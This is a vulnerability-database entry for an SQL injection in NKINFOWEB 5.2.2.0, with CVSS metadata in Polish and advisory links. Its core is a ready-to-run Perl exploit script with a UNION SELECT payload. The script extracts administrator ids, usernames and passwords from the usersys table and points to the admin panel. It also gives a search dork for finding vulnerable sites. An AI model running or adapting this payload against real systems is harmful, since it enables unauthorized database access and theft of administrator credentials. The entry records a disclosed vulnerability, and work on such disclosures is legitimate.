nkinfoweb 5.2.2.0 sql injection

2010.05.01
Credit: d4rk-h4ck3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: NKINFOWEB SQL INJECTION EXPLOIT # Date: 23/04/2010 # Author: d4rk-h4ck3r # Software Link: http://jaist.dl.sourceforge.net/project/nkinfoweb/FunctionNkinfoweb_v.species.rar # Tested on: several linux versions #=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ #!/usr/bin/perl use strict; use LWP::Simple; print "\n"; print "##############################################################\n"; print "# NKINFOWEB SQL INJECTION EXPLOIT #\n"; print "# Author: d4rk-h4ck3r (Tunisian Security Team) #\n"; print "# Greetz to Passeword & Maxilog & all vbspiders members #\n"; print "# Dork: Powered by NKINFOWEB VSp ? 2009 #\n"; print "##############################################################\n"; my $domain = shift @ARGV or banner(); my $injsql ="/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--"; if(get($domain.$injsql) =~ /:::(.+):(.+):(.+):::/) { print "\n[+] Exploit Succesfull!"; print "\n[+] Admin id: : $1"; print "\n[+] Admin username: $2"; print "\n[+] Admin password: $3"; print "\n[+] Admin panel: $domain/administrator/ ";} else { print "[!] Exploit Failed!\n"; print "[!] Site Not Vulnerable!\n"; } sub banner { print "[+] NKINFOWEB <= Remote SQL Injection Exploit\n"; print "[+] Usage: ${0} http://[host]\n"; return exit; } _________________________________________________________________ Consultez vos emails Orange, Gmail, Yahoo!, Free ... directement depuis HOTMAIL ! http://www.windowslive.fr/hotmail/agregation/

Referencje:

http://xforce.iss.net/xforce/xfdb/58082
http://www.exploit-db.com/exploits/12354
http://secunia.com/advisories/39609
http://packetstormsecurity.org/1004-exploits/nkinfoweb-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top